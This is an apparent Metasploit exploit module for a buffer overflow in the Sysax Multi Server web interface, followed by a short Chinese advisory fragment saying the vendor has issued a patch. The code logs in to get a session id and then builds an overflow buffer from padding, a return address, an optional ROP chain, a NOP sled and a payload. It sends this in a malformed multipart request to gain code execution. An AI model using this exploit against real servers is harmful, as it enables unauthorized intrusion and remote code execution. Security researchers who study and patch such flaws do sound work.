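# Logs in to the Sysax web front end to obtain a session id, then sends an
# oversized multipart form field ("e2") to the mk_folder2 handler to trigger
# the overflow and deliver the payload.
#
# Reads datastore['SysaxUSER'], datastore['SysaxPASS'], datastore['RHOST'] and
# the target hash ('Offset', 'Rop', 'Nop', target.ret). No return value; the
# exploit is driven entirely by side effects on the connection.
#
# Fix over the original: the login response was never checked. A timed-out
# request (send_request_raw => nil) raised NoMethodError on res.body, and a
# failed login silently continued with an empty sid, firing the overflow at a
# bogus URL. Both cases now abort with fail_with and a clear message.
def exploit
  user = datastore['SysaxUSER']
  pass = datastore['SysaxPASS']
  # The login form takes base64("<user>\n<pass>") in the "fd" parameter.
  # Base64.encode64 (with its trailing newline) is kept on purpose so the login
  # request stays byte-identical to what the original module sent.
  creds = "fd=" + Base64.encode64(user + "\x0a" + pass)

  connect

  # Step 1: log in; the response carries the session id needed by every later
  # request.
  print_status "Getting SID from #{target_url}"
  res = send_request_raw({
    'method' => 'POST',
    'uri'    => "#{target_url}/scgi?sid=0&pid=dologin",
    'data'   => creds
  }, 20)

  if res.nil? || res.body.nil?
    fail_with(Failure::Unreachable, 'No response to the login request')
  end
  m = res.body.match(/(sid=[A-Z0-9a-z]{40})/)
  if m.nil?
    fail_with(Failure::NoAccess, 'Login failed: no sid in the response (check SysaxUSER/SysaxPASS)')
  end
  # "sid=<40 alphanumerics>", reused verbatim in the query strings below.
  sid = m[1]
  print_status "Your #{sid}"

  # Step 2: build the overflow buffer: padding up to the saved return address,
  # the return address, optionally 16 copies of target['Nop'] followed by a ROP
  # chain, then a short NOP sled and the payload.
  buffer = rand_text(target['Offset'])
  buffer << [target.ret].pack('V')
  if target['Rop']
    buffer << [target['Nop']].pack('V') * 16
    buffer << create_rop_chain()
  end
  buffer << make_nops(15)
  buffer << payload.encoded # max 1299 bytes

  # Step 3: the rest of the request line, a Content-Length header and the whole
  # multipart body are passed through the 'uri' field, so the bytes below are
  # what the server sees immediately after "POST /" (presumably ahead of the
  # headers the HTTP mixin adds itself — verify if the target stops responding).
  # NOTE(review): Content-Length is a fixed 171 although the multipart body is
  # far longer; left as the original author had it, since the exploit is known
  # to work this way — confirm against the target before changing it.
  boundary = "-----------------------------1190753071675116720811342231"
  post_data = "scgi?#{sid}&pid=mk_folder2_name1.htm HTTP/1.1\r\n"
  post_data << "Content-Length: 171\r\n\r\n"
  post_data << "#{boundary}\r\n"
  post_data << "Content-Disposition: form-data; name=\"e2\"\r\n\r\n"
  post_data << buffer + "\r\n"
  post_data << "#{boundary}--\r\n\r\n"

  referer = "http://#{datastore['RHOST']}/scgi?#{sid}&pid=mk_folder1_name1.htm"
  send_request_raw({
    'uri'     => "/" + post_data,
    'version' => '1.1',
    'method'  => 'POST',
    'referer' => referer
  })

  handler
  disconnect
end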
end
建议:
--------------------------------------------------------------------------------
厂商补丁:
sysax
-----
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：